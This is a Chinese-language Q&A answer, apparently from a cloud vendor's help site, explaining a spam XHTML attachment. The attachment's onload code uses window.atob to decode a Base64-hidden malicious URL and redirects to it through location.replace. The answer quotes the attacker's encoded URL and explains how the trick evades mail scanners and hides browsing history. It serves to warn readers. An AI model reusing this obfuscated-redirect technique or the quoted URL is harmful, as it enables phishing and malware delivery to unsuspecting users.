You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

HTML DOM中Window.atob作用是什么?打开垃圾邮件XHTML附件有风险吗?

问题解答

1. window.atob的作用

window.atob是浏览器内置的全局API,专门用于解码经过Base64编码的字符串,得到原始明文内容。攻击者在这里用Base64编码目标网址,核心目的是绕过邮件安全网关的静态恶意内容扫描,避免邮件被系统直接拦截。

2. 整行代码的运行逻辑

当你用浏览器打开这个Open 74218.xhtml文件时,页面加载完成会自动触发<body>标签绑定的onload事件,全程不需要你做任何点击操作:

  • 第一步先执行window.atob('aHR0cDovL3N2ZWdhazAxLnByby96cmcyU3Y/WlFJRFFDQUog'),把这段Base64字符串解码为攻击者预设的真实恶意网址
  • 第二步调用document.location.replace()方法,直接将当前页面重定向到解码后的恶意网址。replace方法的特殊点在于不会在浏览器历史记录中留下当前xhtml文件的访问记录,你点击浏览器后退按钮也无法回到这个页面,进一步隐藏攻击痕迹。

3. 直接打开这类文件的安全风险

存在极高的安全风险,绝对不要直接打开:

  • 只要用浏览器打开文件就会自动跳转到攻击者指定的恶意站点,这类站点通常是仿造正规网站的钓鱼页面,诱导你输入账号密码、银行卡号、验证码等敏感信息,造成财产损失或者账号被盗
  • 部分恶意站点还会利用浏览器的未公开/未修复的漏洞,在你访问时自动下载执行病毒、木马、勒索软件等恶意程序,不需要你手动点击下载按钮就可以入侵你的设备
  • 就算你打开后立刻关闭页面,也可能已经被攻击者记录了你的IP地址、浏览器版本等设备信息,后续可能遭到定向攻击

内容的提问来源于stack exchange,提问作者YasserKhalil

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.09.30 11:39:02